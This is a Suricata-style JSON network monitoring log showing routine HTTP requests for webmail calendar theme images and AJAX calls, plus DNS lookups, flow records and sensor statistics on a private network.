{"timestamp":"2020-02-29T00:26:20.418063+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":10}} {"timestamp":"2020-02-29T00:26:20.418385+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:26:20.424480+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":11}} {"timestamp":"2020-02-29T00:26:20.425560+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.425832+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} 
{"timestamp":"2020-02-29T00:26:20.426617+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:26:20.427177+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":12}} {"timestamp":"2020-02-29T00:26:20.428292+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.434804+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:26:20.435318+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":13}} {"timestamp":"2020-02-29T00:26:20.442759+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":6}} {"timestamp":"2020-02-29T00:26:20.469468+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:26:20.477306+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:26:20.517292+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36501,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:26:20.517292+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36501,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.562334+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45312,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45910,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.670412+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45312,"proto":"UDP","dns":{"type":"answer","id":45910,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.670412+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45312,"proto":"UDP","dns":{"type":"answer","id":45910,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.697573+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} 
{"timestamp":"2020-02-29T00:26:20.697573+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.697674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142}} {"timestamp":"2020-02-29T00:26:20.697674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":16}} 
{"timestamp":"2020-02-29T00:26:25.089026+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":2}} {"timestamp":"2020-02-29T00:26:25.431617+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":2}} {"timestamp":"2020-02-29T00:26:25.438988+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":14}} {"timestamp":"2020-02-29T00:26:25.698314+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":3311,"tx_id":16}} {"timestamp":"2020-02-29T00:26:25.701587+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":7}} 
{"timestamp":"2020-02-29T00:26:27.000360+0000","event_type":"stats","stats":{"uptime":15239,"capture":{"kernel_packets":142113,"kernel_drops":0},"decoder":{"pkts":142127,"bytes":97637978,"invalid":195,"ipv4":140532,"ipv6":10,"ethernet":142127,"raw":0,"null":0,"sll":0,"tcp":134944,"udp":5378,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2915,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2931,"synack":2922,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1921,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2460,"failed_udp":116},"tx":{"http":5021,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2544}},"flow_mgr":{"closed_pruned":2893,"new_pruned":17,"est_pruned":2545,"bypassed_pruned":0,"flows_checked":9,"flows_notimeout":8,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65527,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10562,"memcap_state":0,"memcap_global":0},"http":{"memuse":800,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:27.001155+0000","flow_id":1291220436495971,"event_type":"flow","src_ip":"192.168.10.81","src_port":53136,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":774,"bytes_toclient":709,"start":"2020-02-29T00:25:21.831075+0000","end":"2020-02-29T00:25:26.839931+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:27.001644+0000","flow_id":1482449560383490,"event_type":"flow","src_ip":"192.168.10.81","src_port":53138,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":773,"bytes_toclient":767,"start":"2020-02-29T00:25:21.831490+0000","end":"2020-02-29T00:25:26.839893+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:27.955857+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49429,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14196,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:27.958422+0000","flow_id":1660149541607404,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53162,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:26:28.000774+0000","flow_id":1144869425108000,"event_type":"flow","src_ip":"192.168.10.130","src_port":34292,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":176,"pkts_toclient":348,"bytes_toserver":18553,"bytes_toclient":494833,"start":"2020-02-29T00:25:09.513056+0000","end":"2020-02-29T00:25:25.099949+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:28.064141+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49429,"proto":"UDP","dns":{"type":"answer","id":14196,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:28.064141+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49429,"proto":"UDP","dns":{"type":"answer","id":14196,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:28.111618+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122}} 
{"timestamp":"2020-02-29T00:26:28.111618+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:26:30.000707+0000","flow_id":541469470307065,"event_type":"flow","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":30,"bytes_toserver":5429,"bytes_toclient":24522,"start":"2020-02-29T00:25:19.013049+0000","end":"2020-02-29T00:25:29.452530+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:32.959634+0000","flow_id":1660149541607404,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53162,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":0}} 
{"timestamp":"2020-02-29T00:26:33.000861+0000","flow_id":1107327101640732,"event_type":"flow","src_ip":"192.168.10.122","src_port":41965,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:21:31.925724+0000","end":"2020-02-29T00:21:32.037252+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:33.118390+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53160,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":127,"tx_id":0}} 
{"timestamp":"2020-02-29T00:26:34.000207+0000","event_type":"stats","stats":{"uptime":15246,"capture":{"kernel_packets":142142,"kernel_drops":0},"decoder":{"pkts":142143,"bytes":97641084,"invalid":195,"ipv4":140548,"ipv6":10,"ethernet":142143,"raw":0,"null":0,"sll":0,"tcp":134958,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087552},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2917,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2933,"synack":2924,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2897,"new_pruned":17,"est_pruned":2545,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10561,"memcap_state":0,"memcap_global":0},"http":{"memuse":720,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:38.001255+0000","flow_id":536109336509111,"event_type":"flow","src_ip":"192.168.10.122","src_port":38791,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:21:36.998071+0000","end":"2020-02-29T00:21:37.106785+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:39.000856+0000","flow_id":407294692922328,"event_type":"flow","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1415,"bytes_toclient":6320,"start":"2020-02-29T00:25:33.627672+0000","end":"2020-02-29T00:25:38.952415+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
